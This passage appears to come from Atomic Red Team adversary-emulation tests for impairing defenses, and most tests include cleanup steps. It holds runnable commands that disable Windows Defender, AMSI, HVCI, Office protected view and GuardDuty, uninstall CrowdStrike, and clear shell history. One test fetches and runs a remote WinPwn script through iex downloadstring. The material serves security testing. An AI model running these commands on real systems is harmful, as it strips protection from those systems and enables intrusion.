Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
sc stop WinDefend
sc config WinDefend start= disabled
sc query WinDefend
Cleanup Commands
sc start WinDefend >nul 2>&1
sc config WinDefend start= auto >nul 2>&1
Atomic Test #21: Tamper with Windows Defender Registry
Disables Windows Defender from starting after a reboot. Upon execution, if the computer is rebooted, the entire Virus and Threat Protection window in Settings will be grayed out and show no information.
Supported Platforms: Windows
auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
Cleanup Commands
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
Atomic Test #22: Disable Microsoft Office Security Features
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
Attack Commands: Run with powershell!
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
Cleanup Commands
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
Atomic Test #23: Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware. Check the MpCmdRun.exe man page for info on all arguments. On later versions of Windows (1909+) this command fails even with admin rights due to insufficient privileges. On older versions of Windows the command will report completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
Supported Platforms: Windows
auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| service_name | The name of the service to remove | string | McAfeeDLPAgentService |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument, we need to search for it. Since the executable is located in a folder named with a random GUID, we need to identify it before invoking the uninstaller.
Supported Platforms: Windows
auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
if (Test-Path "#{falcond_path}") {
. "#{falcond_path}" /repair /uninstall /quiet
} else {
Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % {
$sig = $(Get-AuthenticodeSignature -FilePath $_.FullName)
if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break; }
}
}
Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
Malware can exclude a specific path from being scanned, evading detection. Upon successful execution, the folder provided should be on the list of excluded paths. To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionPath
Supported Platforms: Windows
auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| excluded_folder | This folder will be excluded from scanning | path | C:\Temp |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
Cleanup Commands
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
Malware can exclude specific extensions from being scanned, evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionExtension
Supported Platforms: Windows
auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| excluded_exts | A list of extension to exclude from scanning | string | .exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
Cleanup Commands
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
Malware can exclude specific processes from being scanned, evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using PowerShell: (Get-MpPreference).ExclusionProcess
Supported Platforms: Windows
auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| excluded_process | A list of processes to exclude from scanning | string | outlook.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
Cleanup Commands
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
Atomic Test #29: office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
Supported Platforms: Office-365
auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | office-365 username | string | |
| password | office-365 password | string | |
Attack Commands: Run with powershell!
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
Cleanup Commands
if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
}
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Atomic Test #30: Disable Windows Defender with DISM
The following Atomic will attempt to disable Windows Defender using the built-in DISM.exe (Deployment Image Servicing and Management tool). DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution writes nothing to standard output; remove the quiet switch if verbosity is needed. This method will remove Defender and its package.
Supported Platforms: Windows
auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators can be found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with behavior similar to that identified during the WhisperGate campaign. See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
Supported Platforms: Windows
auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| AdvancedRun_Location | Path of Advanced Run executable | path | PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe |
| delete_defender_folder | Set to 1 to also delete the Windows Defender folder | integer | 0 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
Cleanup Commands
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
Dependencies: Run with powershell!
Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
Check Prereq Commands
if(Test-Path -Path "#{AdvancedRun_Location}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
Atomic Test #32: Kill antimalware protected processes using Backstab
Backstab loads the Process Explorer driver, which is signed by Microsoft, and uses it to terminate running processes protected by antimalware software, such as MsSense.exe or MsMpEng.exe, which otherwise cannot be killed. https://github.com/Yaxser/Backstab
Supported Platforms: Windows
auto_generated_guid: 24a12b91-05a7-4deb-8d7f-035fa98591bc
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| process_name | Name of the protected process you want to kill/terminate. | string | MsMpEng.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n #{process_name}
Dependencies: Run with powershell!
Description: Backstab64.exe should exist in the ExternalPayloads directory
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
Atomic Test #33: WinPwn - Kill the event log services for stealth
Kill the event log services for stealth via a function of WinPwn.
Supported Platforms: Windows
auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
Attack Commands: Run with powershell!
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive
Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
Attempts to disable scheduled scanning and other parts of Windows Defender ATP using Set-MpPreference parameter aliases. Upon execution, Virus and Threat Protection will show as disabled in Windows settings.
Supported Platforms: Windows
auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
Cleanup Commands
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
LockBit Black - Disable Privacy Settings Experience Using Registry
Supported Platforms: Windows
auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
Cleanup Commands
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
LockBit Black - Use Registry Editor to turn on automatic logon
Supported Platforms: Windows
auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
Cleanup Commands
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
LockBit Black - Disable Privacy Settings Experience Using Registry
Supported Platforms: Windows
auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force
Cleanup Commands
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Lockbit Black - Use Registry Editor to turn on automatic logon
Supported Platforms: Windows
auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Value password1 -Force
Cleanup Commands
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
The following Atomic will attempt to disable Windows Defender using the built-in PowerShell cmdlet Disable-WindowsOptionalFeature from the Deployment Image Servicing and Management (DISM) module. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not print any details to standard output; remove the quiet switch if verbosity is needed. This method will remove Defender and its packages. Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
Supported Platforms: Windows
auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
The following Atomic will attempt to exclude a folder from Defender scanning by leveraging WMI. Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Supported Platforms: Windows
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
Cleanup Commands
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
Atomic Test #41: Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.
Supported Platforms: Windows
auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
Cleanup Commands
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
Dependencies: Run with command_prompt!
Description: The Windows Defender scheduled tasks must be backed up first
Check Prereq Commands
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )
Get Prereq Commands
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
Atomic Test #42: Clear History
Clear shell history. This technique only affects the bash shell.
Supported Platforms: Linux
auto_generated_guid: 23b88394-091b-4968-a42d-fb8076992443
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
history -c
Atomic Test #43: Suspend History
Suspend shell history, as seen in the AwfulShred wiper. Reference: https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
Supported Platforms: Linux
auto_generated_guid: 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
set +o history
Cleanup Commands
set -o history
Atomic Test #44: Reboot Linux Host via Kernel System Request
Reboot the system via the kernel system request (SysRq) interface, as seen in the AwfulShred wiper.
Supported Platforms: Linux
auto_generated_guid: 6d6d3154-1a52-4d1a-9d51-92ab8148b32e
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
echo 1 > /proc/sys/kernel/sysrq
echo b > /proc/sysrq-trigger
Atomic Test #45: Clear Paging Cache
Clear the paging cache by writing to /proc/sys/vm/drop_caches. This is a temporary change to the system that clears the page cache. The AwfulShred wiper used this technique as part of its malicious payload on the compromised host. Reference: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
Supported Platforms: Linux
auto_generated_guid: f790927b-ea85-4a16-b7b2-7eb44176a510
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3 > /proc/sys/vm/drop_caches
Atomic Test #46: Disable Memory Swap
Disable swap so that the compromised host can no longer swap data out when RAM is full. The AwfulShred wiper used this technique as an additional payload on the compromised host, to make sure no recoverable data is left behind by the swap feature of FreeBSD/Linux.
Supported Platforms: Linux
auto_generated_guid: e74e4c63-6fde-4ad2-9ee8-21c3a1733114
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
swapon -a
sleep 2
swapoff -a
sync
Cleanup Commands
swapon -a
sleep 2
sync
Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the "Enabled" value of the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity to "0". The prerequisite needs to be run first in order to set up HVCI and have it enabled. We do not recommend running this in production. Reference: Black Lotus campaign (Microsoft).
Supported Platforms: Windows
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
Cleanup Commands
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
Dependencies: Run with powershell!
Description: HVCI must be enabled
Check Prereq Commands
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
Get Prereq Commands
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
Atomic Test #48: AMSI Bypass - Override AMSI via COM
With administrative rights, an adversary can disable AMSI via a registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and pointing it to a DLL that does not exist. This is currently being used by AsyncRAT and others. https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
Supported Platforms: Windows
auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
Cleanup Commands
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
Atomic Test #49: AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS; upon successful creation, this test suspends and then deletes the GuardDuty detector.
Supported Platforms: Iaas:aws
auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| region | Name of the specified region | string | us-east-1 |
Attack Commands: Run with bash!
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
Cleanup Commands
echo "If test successfully ran, no cleanup required."
Dependencies: Run with bash!
Description: Check that the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands
cat ~/.aws/credentials | grep "default"
Get Prereq Commands
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
Atomic Test #50: Tamper with Defender ATP on Linux/MacOS
With root privileges, an adversary can disable real-time protection. Note that this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or a Defender .plist on macOS will prevent these changes. Tamper protection will also prevent this (available on macOS, but not on Linux at the time of writing). Installation of MDATP is a prerequisite; installation steps vary across macOS and Linux distros. See Microsoft's public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
Supported Platforms: Linux, macOS
auto_generated_guid: 40074085-dbc8-492b-90a3-11bcfc52fda8
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo mdatp config real-time-protection --value disabled
Cleanup Commands
sudo mdatp config real-time-protection --value enabled
Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
Disable Windows Defender by tampering with the Windows Defender registry keys using the utility "reg.exe".
Supported Platforms: Windows
auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
